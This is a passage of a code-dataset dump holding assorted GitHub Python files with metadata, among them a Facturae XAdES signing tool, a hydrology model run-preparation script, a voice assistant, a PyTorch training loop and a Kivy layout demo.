calc_pythagorean_theorem()","repo_name":"garthmortensen/programs","sub_path":"testing/numeric/math_stuff_undesirable_2.py","file_name":"math_stuff_undesirable_2.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"14885548977","text":"import sys\n\nfilename = sys.argv[0]\narguments = sys.argv[1:]\n\nfood = arguments[0]\nquantity = int(arguments[1])\ncost = float(arguments[2])\n\nprint(\"You are buying {} {} for ${}\".format(quantity, food, quantity * cost))\n","repo_name":"RealKevinApetrei/MTA-Python-Course-Work","sub_path":"Part 1/Introduction to Python (2)/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"7747383805","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom lxml import etree\nimport xmlsig\nfrom xades import ObjectIdentifier, XAdESContext, template, utils\nfrom xades.policy import GenericPolicyId\nfrom cryptography.hazmat.primitives.serialization import pkcs12 # Do not remove, it is used !!!\n\n#------------------------------------------------------------------------\nfrom xades.constants import MAP_HASHLIB\nfrom xades.policy import ETSI, DS\nfrom xmlsig.utils import get_rdns_name\nfrom base64 import b64encode\n\nclass MiGenericPolicyId(GenericPolicyId):\n    \"\"\"\n    Overridden to change 'self.hash_method' to 'xmlsig.constants.TransformSha512'\n    \"\"\"\n    def calculate_certificate(self, node, key_x509):\n        fingerprint = key_x509.fingerprint(MAP_HASHLIB[xmlsig.constants.TransformSha512]())\n        _ETSI_Cert = ETSI.Cert(\n            ETSI.CertDigest(\n                DS.DigestMethod(Algorithm=xmlsig.constants.TransformSha512),\n                DS.DigestValue(b64encode(fingerprint).decode()),\n            ),\n            ETSI.IssuerSerial(\n                DS.X509IssuerName(get_rdns_name(key_x509.issuer.rdns)),\n                DS.X509SerialNumber(str(key_x509.serial_number)),\n            ),\n        )\n        node.append(_ETSI_Cert)\n\n#------------------------------------------------------------------------\nimport OpenSSL\nfrom cryptography.x509 import Certificate\nclass MiXAdESContext(XAdESContext):\n    \"\"\"\n    Overridden to add the 'ca_certificates'\n    \"\"\"\n    def load_pkcs12(self, 
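# key may be a pyOpenSSL PKCS12, a cryptography PKCS12KeyAndCertificates, or a (private_key, cert, ca_list) tuple\n                     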
key):\n        if isinstance(key, OpenSSL.crypto.PKCS12):\n            # This would happen if we are using pyOpenSSL\n            self.x509 = key.get_certificate().to_cryptography()\n            self.public_key = key.get_certificate().to_cryptography().public_key()\n            self.private_key = key.get_privatekey().to_cryptography_key()\n            self.ca_certificates = key.get_ca_certificates()\n        elif isinstance(key, pkcs12.PKCS12KeyAndCertificates):\n            # This would happen if we are using cryptography\n            # when the key is read with load_pkcs12\n            self.x509 = key.cert.certificate\n            self.public_key = key.cert.certificate.public_key()\n            self.private_key = key.key\n            for cer in key.additional_certs:\n                self.ca_certificates.append(cer.certificate)\n        elif isinstance(key, tuple):\n            # This would happen if we are using cryptography\n            # when the key is read with load_key_and_certificates\n            self.x509 = key[1]\n            self.public_key = key[1].public_key()\n            self.private_key = key[0]\n            # Patch to obtain the ca_certificates\n            if len(key) > 2 and isinstance(key[2], list):\n                for cer in key[2]:\n                    if isinstance(cer, Certificate):\n                        self.ca_certificates.append(cer)\n        else:\n            raise NotImplementedError()\n\n#------------------------------------------------------------------------\nfrom xmlsig.utils import create_node\nfrom xades.ns import EtsiNS\nclass MiObjectIdentifier(ObjectIdentifier):\n\n    def to_xml(self, node):\n        \"\"\"\n        Overridden to add the attribute: 'Qualifier=\"OIDAsURN\"'\n        \"\"\"\n        n = create_node('Identifier', node, EtsiNS, text=self.identifier)\n        n.set('Qualifier', 'OIDAsURN')\n        if self.description is not None:\n            create_node('Description', node, EtsiNS).text = self.description\n        if len(self.references) > 0:\n            documentation = create_node('DocumentationReferences', node, EtsiNS)\n            for reference in self.references:\n                create_node(\n                    'DocumentationReference', documentation, EtsiNS\n                ).text = reference\n\n#------------------------------------------------------------------------\n\n\ndef firma(certificado, origen, verify=True):\n    root = etree.parse(origen).getroot()\n\n    signature_id = utils.get_unique_id()\n    reference_id = utils.get_unique_id()\n\n    signature = xmlsig.template.create(\n        xmlsig.constants.TransformInclC14N,\n        xmlsig.constants.TransformRsaSha512,\n        f'Signature-{signature_id}-Signature',\n    )\n    ref = xmlsig.template.add_reference(\n        signature,\n        xmlsig.constants.TransformSha512,\n        uri='',\n        name=f'Reference-{reference_id}'\n    )\n    xmlsig.template.add_transform(ref, xmlsig.constants.TransformEnveloped)\n\n    xmlsig.template.add_reference(\n        signature,\n        xmlsig.constants.TransformSha512,\n        uri=f'#Signature-{signature_id}-SignedProperties',\n        uri_type='http://uri.etsi.org/01903#SignedProperties'\n    )\n    xmlsig.template.add_reference(\n        signature, xmlsig.constants.TransformSha512,\n        uri=f'#Signature-{signature_id}-KeyInfo'\n    )\n    ki = xmlsig.template.ensure_key_info(\n        signature,\n        name=f'Signature-{signature_id}-KeyInfo'\n    )\n    data = xmlsig.template.add_x509_data(ki)\n    xmlsig.template.x509_data_add_certificate(data)\n    xmlsig.template.add_key_value(ki)\n\n    qualifying = template.create_qualifying_properties(\n        signature,\n        etsi='xades',\n        name=f'Signature-{signature_id}-QualifyingProperties'\n    )\n    #utils.ensure_id(qualifying)\n\n    props = template.create_signed_properties(\n        qualifying,\n        datetime=datetime.now(),\n        name=f'Signature-{signature_id}-SignedProperties'\n    )\n    template.add_claimed_role(props, 'emisor')\n    signed_do = template.ensure_signed_data_object_properties(props)\n    template.add_data_object_format(\n        signed_do,\n        reference=f'#Reference-{reference_id}',\n        
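# MiObjectIdentifier (defined above) serializes this identifier with Qualifier=\"OIDAsURN\"\n        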
identifier=MiObjectIdentifier('urn:oid:1.2.840.10003.5.109.10', ''),\n        mime_type='text/xml',\n        encoding='',\n        description=''\n    )\n\n    root.append(signature)\n\n    policy = MiGenericPolicyId(\n        'https://www.facturae.gob.es/politica_de_firma_formato_facturae/'\n        'politica_de_firma_formato_facturae_v3_1.pdf',\n        'Politica de Firma FacturaE v3.1',\n        xmlsig.constants.TransformSha1,\n    )\n\n    ctx = MiXAdESContext(policy)\n    ctx.load_pkcs12(certificado)\n    ctx.sign(signature)\n    if verify:\n        ctx.verify(signature)\n\n    return etree.tostring(root, encoding='UTF-8', xml_declaration=True, standalone=False)\n\n\nif __name__ == '__main__':\n    import sys\n    import os\n    import argparse\n    from io import StringIO, BytesIO\n    from cryptography.hazmat.primitives.serialization import pkcs12\n    import codecs\n\n    __version__ = '0.0.1'\n\n    parser = argparse.ArgumentParser(description='Facturae v3.2.x XAdES XML signing (by Juhegue)')\n    parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)\n    parser.add_argument('-o', '--origen', dest='origen', type=str, help='Source XML', required=True)\n    parser.add_argument('-c', '--certificado', dest='certificado', type=str, help='pkcs12 certificate', required=True)\n    parser.add_argument('-p', '--clave', dest='clave', type=str, help='Certificate password', required=True)\n    parser.add_argument('-x', '--validar', dest='validar', type=str, help='Version to validate', required=False,\n                        choices=['3.2', '3.2.1', '3.2.2', 'null'], default='3.2')\n    args = parser.parse_args()\n\n    class FirmaError(Exception):\n        ...\n\n    try:\n        try:\n            with open(args.certificado, 'rb') as f:\n                data = f.read()\n            # certificado = OpenSSL.crypto.load_pkcs12(data, args.clave.encode())\n            # certificado = pkcs12.load_pkcs12(data, args.clave.encode())\n            certificado = pkcs12.load_key_and_certificates(data, args.clave.encode())\n        except Exception as e:\n            raise FirmaError(f'ERROR certificate [{e.__class__.__name__}]. {e}')\n\n        try:\n            root = etree.parse(args.origen)\n            xml = etree.tostring(root, encoding='UTF-8', xml_declaration=False).decode('utf8')\n        except Exception as e:\n            raise FirmaError(f'ERROR XML [{e.__class__.__name__}]. {e}')\n    \n        try:\n            verify = False if args.validar == 'null' else True\n            xsig = firma(certificado, StringIO(xml), verify).decode()\n        except Exception as e:\n            raise FirmaError(f'ERROR signing [{e.__class__.__name__}]. {e}')\n\n        if args.validar != 'null':\n            try:\n                version = args.validar.replace('.', '_')\n                path = os.path.join(os.path.dirname(__file__))\n                xsd = os.path.join(path, 'data', f'Facturaev{version}.xml')\n                with codecs.open(xsd, 'r', 'utf-8') as f:\n                    xsd_data = f.read()\n                xsd_shema = os.path.join(path, 'data', 'xmldsig-core-schema.xsd')\n                xsd_shema = 'file:///' + xsd_shema.replace('\\\\', '/')\n                xsd_data = xsd_data.replace('http://www.w3.org/TR/xmldsig-core/xmldsig-core-schema.xsd', xsd_shema)\n                xsd_tree = etree.fromstring(xsd_data)\n                xml_tree = etree.parse(BytesIO(xsig.encode('utf-8')))\n                schema = etree.XMLSchema(xsd_tree)\n                schema.assertValid(xml_tree)\n            except etree.DocumentInvalid:\n                errors = list()\n                for error in schema.error_log:\n                    errors.append(f'(Line {error.line}) {error.message}')\n                err = '. '.join(errors)\n                raise FirmaError(f'ERROR validating: {err}')\n\n            except Exception as e:\n                raise FirmaError(f'ERROR validating [{e.__class__.__name__}]. {e}')\n\n        pathname, _ = os.path.splitext(args.origen)\n        try:\n            with codecs.open(f'{pathname}.xsig', 'w', 'utf-8') as f:\n                f.write(xsig)\n        except Exception as e:\n            raise FirmaError(f'ERROR saving [{e.__class__.__name__}]. 
{e}')\n\n    except FirmaError as e:\n        print(e)\n        sys.exit(1)\n","repo_name":"juhegue/firmafe","sub_path":"firmafe.py","file_name":"firmafe.py","file_ext":"py","file_size_in_byte":9871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1119215668","text":"from django.contrib import admin\nfrom django.urls import path\nfrom app import views\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('',views.user_login,name = 'login'),\n    path('logout',views.logoutuser,name = 'logout'),\n    path('index/', views.index, name='index'),\n    path('add/', views.add, name='add'),\n    path('update//', views.update, name='update_data'),\n    path('updatenew//', views.update_new, name='update_new'),\n    path('delete//', views.deletedata, name='delete_data'),\n    path('register/', views.registerPage,name ='register')\n]","repo_name":"rohit7630/studentdata","sub_path":"studentdata/studentdata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72397976107","text":"import sys\nimport datetime\nimport os\nimport shutil\n# Linux command for utc YYYYMMDDHHmm: date -u +%Y%m%d%H%M\n\ndatetime_format_str = \"%Y%m%d%H\"\nforecast_timestep_size_tdelta = datetime.timedelta(hours=1)\nmodel_run_output_timespan_tdelta = datetime.timedelta(days=7, hours=6)\nmodel_run_interval_tdelta = datetime.timedelta(hours=12)\n\nlsm_source_path = \"/home/sherry/Downloads/COSMO/drew_test/all_in_one\"\ntemplate_path = \"/home/sherry/Downloads/COSMO/drew_test/\"\ntarget_path = \"/home/sherry/Downloads/COSMO/drew_test/run\"\n\n\ndef _create_folder(path):\n    if not os.path.exists(path):\n        os.makedirs(path)\n    else:\n        print(\"Folder already exists at {}\".format(path))\n\n\ndef _copy_lsm(lsm_source_path, target_path, model_dt, symlink=False):\n    print(\"Copying LSM....\")\n    fn_format = \"PLATANC_{model_dt}_{forecast_dt}.nc\"\n\n    end_frst_dt = model_dt + model_run_output_timespan_tdelta - forecast_timestep_size_tdelta\n    current_frst_dt = model_dt - forecast_timestep_size_tdelta\n    while current_frst_dt <= end_frst_dt:\n        current_frst_dt += forecast_timestep_size_tdelta\n        current_frst_fn = fn_format.format(model_dt=model_dt.strftime(datetime_format_str), forecast_dt=current_frst_dt.strftime(datetime_format_str))\n\n        source_file_path = os.path.join(lsm_source_path, current_frst_fn)\n        target_file_path = os.path.join(target_path, current_frst_fn)\n\n        # if symlink:\n        #     if not (os.path.islink(target_file_path) and os.path.getsize(source_file_path) == os.path.getsize(target_file_path)):\n        #         os.symlink(source_file_path, target_file_path)\n        # else:\n        if not(os.path.isfile(target_file_path) and os.path.getsize(source_file_path) == os.path.getsize(target_file_path)):\n            shutil.copyfile(source_file_path, target_file_path)\n            print(\"Copying to {}\".format(target_file_path))\n        else:\n            print(\"File already exists at {}\".format(target_file_path))\n\n\ndef _find_closest_model_run_dt(dt, search_future=False):\n    input_dt = dt\n    utc00 = datetime.datetime(year=input_dt.year, month=input_dt.month, day=input_dt.day, hour=0)\n    utc12 = datetime.datetime(year=input_dt.year, month=input_dt.month, day=input_dt.day, hour=12)\n    if search_future:\n        if input_dt > utc12:\n            return utc12 + model_run_interval_tdelta\n        elif input_dt > utc00:\n            return utc12\n        else:\n            return utc00\n    else:\n        if input_dt >= utc12:\n            return utc12\n        else:\n            return utc00\n\n\ndef _build_dt_list(model_run_first_dt, 
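# returns the inclusive list of run datetimes from first to last, stepped by interval\n                   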
model_run_last_dt, interval=model_run_interval_tdelta):\n    model_run_dt_list = [model_run_first_dt]\n    while model_run_dt_list[-1] < model_run_last_dt:\n        model_run_dt_list.append(model_run_dt_list[-1] + interval)\n    model_run_dt_list.sort()\n    return model_run_dt_list\n\n\ndef prepare_model_run(model_run_start_dt, model_run_end_dt=None):\n\n    model_run_dt_list = []\n    if model_run_end_dt:\n        model_run_first_dt = _find_closest_model_run_dt(model_run_start_dt, search_future=True)\n        model_run_last_dt = _find_closest_model_run_dt(model_run_end_dt)\n        model_run_dt_list = _build_dt_list(model_run_first_dt, model_run_last_dt)\n    else:\n        model_run_dt_list=[_find_closest_model_run_dt(model_run_start_dt)]\n\n    print(\"Preparing {} runs: {}\".format(len(model_run_dt_list), model_run_dt_list))\n\n    for i in range(len(model_run_dt_list)):\n        model_run_dt = model_run_dt_list[i]\n        print(\"Preparing Run No{}: {}\".format(i, model_run_dt))\n        if i == 0:\n            previous_model_run_dt = None\n        else:\n            previous_model_run_dt = model_run_dt_list[i-1]\n\n        # create a parent folder for this run YYYYMMDDHH\n        run_folder_name = model_run_dt.strftime(datetime_format_str)\n        run_folder_path = os.path.join(target_path, run_folder_name)\n        _create_folder(run_folder_path)\n        # create \"data\" folder\n        data_folder_path = os.path.join(run_folder_path, \"data\")\n        _create_folder(data_folder_path)\n        # create lsm folder\n        lsm_folder_name = run_folder_name\n        lsm_folder_path = os.path.join(data_folder_path, lsm_folder_name)\n        _create_folder(lsm_folder_path)\n        # copy lsm\n        _copy_lsm(lsm_source_path, lsm_folder_path, model_run_dt)\n\n        # copy input folder\n        input_source_path = os.path.join(template_path, \"input\")\n        input_folder_path = os.path.join(run_folder_path, \"input\")\n        if os.path.isdir(input_folder_path):\n            import uuid\n            os.rename(input_folder_path, input_folder_path + \"_\" + str(uuid.uuid4())[:6])\n        shutil.copytree(input_source_path, input_folder_path)\n\n    return model_run_dt_list\n\n\ndef main():\n    #current_utc_dt_str = sys.argv[1]\n    #print (current_utc_dt_str)\n    #current_utc_dt = datetime.datetime.strptime(current_utc_dt_str, \"%Y%m%d%H%M\")\n\n    #start_utc_dt = datetime.datetime.utcnow()\n    #end_utc_dt = None\n\n    start_utc_dt = datetime.datetime(year=2018, month=8, day=8, hour=0)\n    end_utc_dt = datetime.datetime(year=2018, month=8, day=9, hour=0)\n\n    model_run_dt_list = prepare_model_run(start_utc_dt, end_utc_dt)\n\n    from RAPIDpy.inflow import run_lsm_rapid_process\n\n    for model_run_dt in model_run_dt_list:\n\n        model_run_dt_str = model_run_dt.strftime(\"%Y%m%d%H\")\n        model_run_root = os.path.join(target_path, model_run_dt_str)\n        previous_model_run_dt = model_run_dt - datetime.timedelta(hours=12)\n\n        previous_model_run_dt_str = previous_model_run_dt.strftime(\"%Y%m%d%H\")\n        previous_model_run_root = os.path.join(target_path, previous_model_run_dt_str)\n\n        # Run Cosmo\n        run_lsm_rapid_process(\n            rapid_executable_location='/home/sherry/rapid/run/rapid',\n            rapid_io_files_location=model_run_root,\n            lsm_data_location=os.path.join(model_run_root, \"data\", model_run_dt_str),\n            use_all_processors=False, # defaults to use all processors available\n            num_processors=1, # you can change this number if use_all_processors=False\n            generate_initialization_file=True,\n            timedelta_between_simulations=datetime.timedelta(hours=12),\n            initial_flows_file=os.path.join(previous_model_run_root, \"qinit.csv\"),\n            # path to folder with LSM data\n            # simulation_start_datetime=datetime(1980, 1, 1),\n            # simulation_end_datetime=datetime(2017, 1, 1),\n            # 
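(optional run_lsm_rapid_process overrides, intentionally left commented out)\n            # 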
file_datetime_re_pattern = r'\\d{12}',\n            # file_datetime_pattern = \"%Y%m%d%H%M\",\n            # file_datetime_re_pattern = r'\\d{6}',\n            # file_datetime_pattern = \"%Y%m\",\n            # expected_time_step = \"86400\",\n            # convert_one_hour_to_three=False\n        )\n\n\nif __name__ == \"__main__\":\n\n    main()\n\n","repo_name":"xhqiao89/run_rapidpy","sub_path":"run_cosmo_docker.py","file_name":"run_cosmo_docker.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35658936786","text":"import pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\nimport os\nimport smtplib\nfrom googlesearch import search\nimport google\n\n\n# Put your Chrome application's path here\nchrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n\n# initializing the voice engine\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n\n# setting the voice\nengine.setProperty('voice', voices[len(voices)-2].id)\n\n\n# takes a string and pronounces it\ndef speak(audio):\n\n    engine.say(audio)\n    engine.runAndWait()\n\n\ndef greetMe():\n    currentH = int(datetime.datetime.now().hour)\n    if currentH >= 0 and currentH < 12:\n        speak('good morning, sir!')\n\n    if currentH >= 12 and currentH < 18:\n        speak('good afternoon, sir!')\n\n    if currentH >= 18 and currentH != 0:\n        speak('good evening, sir!')\n\n    speak(\"I am your assistant, how may I help you?\")\n\n# Take your voice command\n\n\ndef takeCommand():\n    r = sr.Recognizer()\n\n    # put your microphone's index as the argument to sr.Microphone function.\n    # You can get indexes of connected microphones by running audio.py file\n    with sr.Microphone(1) as source:\n        print(\"Listening...\")\n        # a 0.6 sec pause in your voice will break the listening process and it will start recognizing\n        r.pause_threshold = 0.6\n        audio = r.listen(source)\n    try:\n        print(\"recognizing...\")\n        # Google speech recognizer\n        query = r.recognize_google(audio, language='en-in')\n        print('User said : ' + query + '\\n')\n\n    except sr.UnknownValueError:\n        speak('Sorry sir! I didn\\'t get that! 
Try typing the command!')\n        query = str(input('Command: '))\n\n    return query\n\n\ngreetMe()\n\nwhile True:\n\n    query = takeCommand().lower()\n\n# Implemented functions to do various tasks.\n\n    if 'wikipedia' in query:\n        speak('searching wikipedia...')\n        query = query.replace(\"wikipedia\", \"\")\n        results = wikipedia.summary(query, sentences=1)\n        print(results)\n        speak(results)\n\n    elif 'open youtube' in query:\n        speak(\"opening youtube\")\n        webbrowser.open(\"youtube.com\")\n\n    elif 'open google' in query:\n        speak(\"opening google\")\n        webbrowser.open(\"google.com\")\n\n    elif 'open pictures' in query:\n\n        pictures = 'C:\\\\Users\\\\2019c\\\\Pictures' # Your picture directory here\n\n        action = os.listdir(pictures)\n        os.startfile(os.path.join(pictures, action[0]))\n\n    elif 'play' in query:\n\n        music_dir = \"D:\\\\SONGS\" # Put your song directory's address here\n        songs = os.listdir(music_dir)\n        query = query.replace(\"play \", \"\")\n        n = len(songs)\n        for i in range(n):\n\n            if query in songs[i].lower():\n                print(songs[i])\n                speak(\"Playing \" + query)\n                os.startfile(os.path.join(music_dir, songs[i]))\n                break\n\n    elif 'the time' in query:\n        strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n        speak(f\"Sir, the time is {strtime}\")\n\n    elif 'open pycharm' in query:\n        speak(\"opening pycharm\")\n        pypath = \"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2019.2.3\\\\bin\\\\pycharm64.exe\"\n        os.startfile(pypath)\n\n    # you can open any application by giving its path to os.startfile function\n\n    elif 'what is your name' in query:\n\n        speak(\"no need to know my name, I am your assistant and my work is to obey you!\")\n\n    elif 'who are you' in query:\n        speak(\"I am your assistant, how can you forget me?\")\n\n    elif 'hello' in query:\n        speak(\"hi, how may I help you?\")\n\n    elif 'what can you do' in query:\n        speak(\"tell me something to do\")\n\n    elif query == \"jarvis\":\n        speak(\"Order Sir\")\n\n    elif 'quit' in query or 'bye' in query or \"terminate\" in query or \"thank you\" in query or \"thanks\" in query:\n        speak(\"see you again\")\n        break\n\n    elif 'search google' in query:\n        speak(\"what do you want to search?\")\n        command = takeCommand()\n        list = []\n        speak(\"searching google\")\n        for i in search(command, tld=\"co.in\", num=4, stop=4, pause=2):\n            print(i)\n            list.append(i)\n\n        speak(\"wanna make me search for one of the urls in browser?\")\n        cmd = takeCommand()\n        if 'yes' in cmd:\n            speak(\"which one? 
\")\n ans = takeCommand()\n if 'first' in ans or 'I' in ans or '1' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[0])\n if 'second' in ans or 'II' in ans or '2' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[1])\n if 'third' in ans or 'III' in ans or '3' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[2])\n if 'fourth' in ans or 'IV' in ans or '4' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[3])\n\n else:\n exit\n break\n\n else:\n speak(\"ok\")\n break\n\n elif 'open vs code' in query:\n speak('opening v s code')\n os.startfile(\n \"C:\\\\Users\\\\2019c\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\")\n elif 'open my facebook' in query:\n speak(\"opening your facebook\")\n webbrowser.get(chrome_path).open(\"www.facebook.com/ritek.saxena.3\")\n\n elif 'open my instagram' in query:\n speak(\"opening your instagram\")\n webbrowser.get(chrome_path).open(\n \"https://www.instagram.com/ritek_saxena/?hl=en\")\n\n else:\n speak(f'searching {query} over the internet ')\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=1)\n print(results)\n speak(results)\n","repo_name":"RitekSaxena/Personal-assistant","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29667693465","text":"import os\nimport sys\nimport cv2\nimport yaml\n\ndef configGen(filepath):\n config = {}\n fs = cv2.FileStorage(\"{}/camera_parameter.yml\".format(filepath), cv2.FILE_STORAGE_READ)\n with open(\"{}/ORB.yaml\".format(filepath), \"w\") as w:\n w.write(\"%YAML:1.0\\n\")\n fn = fs.getNode(\"camera_matrix\")\n m = fn.mat()\n config[\"Camera.fx\"] = float(m[0][0])\n config[\"Camera.fy\"] = float(m[1][1])\n config[\"Camera.cx\"] = float(m[0][2])\n config[\"Camera.cy\"] = float(m[1][2])\n\n fn = fs.getNode(\"distortion_coefficients\")\n m = fn.mat()\n config[\"Camera.k1\"] = float(m[0])\n config[\"Camera.k2\"] = float(m[1])\n config[\"Camera.p1\"] = float(m[2])\n config[\"Camera.p2\"] = float(m[3])\n config[\"Camera.k3\"] = float(m[4])\n\n config[\"Camera.fps\"] = 30.0\n config[\"Camera.RGB\"] = 1\n\n config[\"ORBextractor.nFeatures\"] = 5000\n config[\"ORBextractor.scaleFactor\"] = 1.2\n config[\"ORBextractor.nLevels\"] = 15\n config[\"ORBextractor.iniThFAST\"] = 20\n config[\"ORBextractor.minThFAST\"] = 7\n\n config[\"Viewer.KeyFrameSize\"] = 0.05\n config[\"Viewer.KeyFrameLineWidth\"] = 1\n config[\"Viewer.GraphLineWidth\"] = 0.9\n config[\"Viewer.PointSize\"] = 2\n config[\"Viewer.CameraSize\"] = 0.08\n config[\"Viewer.CameraLineWidth\"] = 3\n config[\"Viewer.ViewpointX\"] = 0\n config[\"Viewer.ViewpointY\"] = -0.7\n config[\"Viewer.ViewpointZ\"] = -1.8\n config[\"Viewer.ViewpointF\"] = 500\n\n yaml.dump(config, w, default_flow_style=False)\n\n\nif __name__ == \"__main__\":\n configGen(sys.argv[1]) ","repo_name":"mhyeh/AccidentSceneReconstruction","sub_path":"configGen.py","file_name":"configGen.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35926457288","text":"import torch.nn.functional as F\nimport torch\n\ndef train(model, optimizer, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n for epoch in range(epochs):\n print(f\"epoch: {epoch}\")\n training_loss = 0.0\n 
valid_loss = 0.0\n        model.train()\n        \n        for batch in train_loader:\n            optimizer.zero_grad()\n            input,target = batch\n            print(input)\n            print(target)\n            print(device)\n            input = input.to(device)\n            print(\"after input\")\n            target = target.to(device)\n            print(\"after output\")\n            output = model(input)\n            print(\"after model\")\n            loss = loss_fn(output,target)\n            print(\"loss input\")\n            loss.backward()\n            optimizer.step()\n            training_loss += loss.data.item()\n        \n        training_loss /= len(train_loader)\n        \n        model.eval()\n        num_correct = 0\n        num_examples = 0\n        \n        for batch in val_loader:\n            input, target = batch\n            input = input.to(device)\n            target = target.to(device)\n            output = model(input)\n            loss = loss_fn(output,target)\n            valid_loss += loss.data.item()\n            correct = torch.eq(torch.max(F.softmax(output, dim=1),dim=1)[1],target).view(-1)\n            \n            num_correct += torch.sum(correct).item()\n            num_examples += correct.shape[0]\n        valid_loss /= len(val_loader)\n        \n        print('Epoch: {}, Training loss: {:.2f}, \\\n        Validation Loss: {:.2f}, \\\n        accuracy: {:.2f}'.format(epoch, training_loss, valid_loss, num_correct/num_examples)\n        )\n    print(\"here\")\n    torch.save(model.state_dict(),\"model/net/final.model\")","repo_name":"NajiAboo/dog-cat-classification","sub_path":"trainmodel/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72495528108","text":"from engine.models import *\n\nprev_ip = \"172.16.18.249:443\"\nnew_ip = \"127.0.0.1:8000\"\n\nfor s in Sentences.objects.all():\n\ts.sentence = s.sentence.replace(prev_ip, new_ip)\n\ts.save()\n\nfor valid in DataValidators.objects.all():\n\tvalid.function = valid.function.replace(prev_ip, new_ip)\n\tvalid.save()\n\n","repo_name":"olofmeister442/temp","sub_path":"replace_ip.py","file_name":"replace_ip.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"14694930125","text":"def search_rotated_array(arr, num):\n    return search(arr, num, 0, len(arr)-1)\n\n\ndef search(arr, num, l, r):\n\n    # If left index is greater than right, num is not in arr\n    if l > r:\n        return -1\n\n    # Find midpoint\n    m = (l + r) // 2\n\n    # Check if mid element is equal to num. If it is, return that index\n    if arr[m] == num:\n        return m\n\n    # If the first element is <= the mid element, the left half is ordered correctly\n    if arr[l] <= arr[m]:\n\n        # Check if num is between the values. If it is, we can do a normal binary search of the left subarray\n        if arr[l] <= num and num <= arr[m]:\n            return search(arr, num, l, m-1)\n\n        # If not, we can repeat process with right subarray\n        else:\n            return search(arr, num, m+1, r)\n\n    # If midpoint is less than last element, right half is ordered correctly\n    elif arr[m] < arr[r]:\n\n        # Check if num is between the values. 
If it is, we can do a normal binary search of the right subarray\n        if arr[m] <= num and num <= arr[r]:\n            return search(arr, num, m+1, r)\n\n        # If not, we can repeat process with left subarray\n        else:\n            return search(arr, num, l, m-1)\n\n    # If above conditions fail, we have an error\n    else:\n        return 'ERROR'\n\n\nif __name__ == '__main__':\n    arr = [9, 12, 17, 2, 4, 5]\n    num = 9\n    print(search_rotated_array(arr, num))","repo_name":"troywsmith/pygo","sub_path":"practice/Pramp/search_rotated_arr.py","file_name":"search_rotated_arr.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22695111177","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.widget import Widget\n\n\nclass MainWindow(FloatLayout):\n    def __init__(self):\n        super().__init__()\n\n        self.btn1= Button(\n            text=\"Hello\",\n            size = (200,100), # 1. width, 2. height\n            #width=200,\n            #height=300,\n            size_hint=(None, None), #default size_hint=(1, 1)\n            pos_hint={\"center_y\":0.5}\n        )\n        self.btn1.bind(on_press=self.push)\n\n        self.btn2=Button(\n            text=\"Center\",\n            size_hint=(.2,.4),\n            pos_hint={\"center\" : (0.5, 0.5)} #center_x center_y\n        )\n        self.btn2.bind(on_press=App.get_running_app().stop)\n\n        self.btn3 = Button(\n            text=\"Top/Right\",\n            size_hint=(.2, 0.4),\n            pos_hint = {\"top\": 0.5, \"right\": 0.5}\n        )\n        self.btn3.bind(state=self.callback)\n        self.btn4 = Button(\n            text=\"x, y\",\n            size_hint=(.2, 0.4),\n            pos_hint={\"x\": 0.5, \"y\": 0.5}\n        )\n        self.add_widget(self.btn1)\n        self.add_widget(self.btn2)\n        self.add_widget(self.btn3)\n        self.add_widget(self.btn4)\n    def push(self,instance): # instance will be the widget instance\n        print(\"You pressed the button\")\n    def callback(self, instance, value):\n        print(\"My button <%s> state is <%s>\" % (instance, value))\n\n\nclass TestApp(App):\n    def build(self):\n        return MainWindow()\n\nTestApp().run()","repo_name":"intelbarna97/python_01","sub_path":"pythonProject/06_floatlayout.py","file_name":"06_floatlayout.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
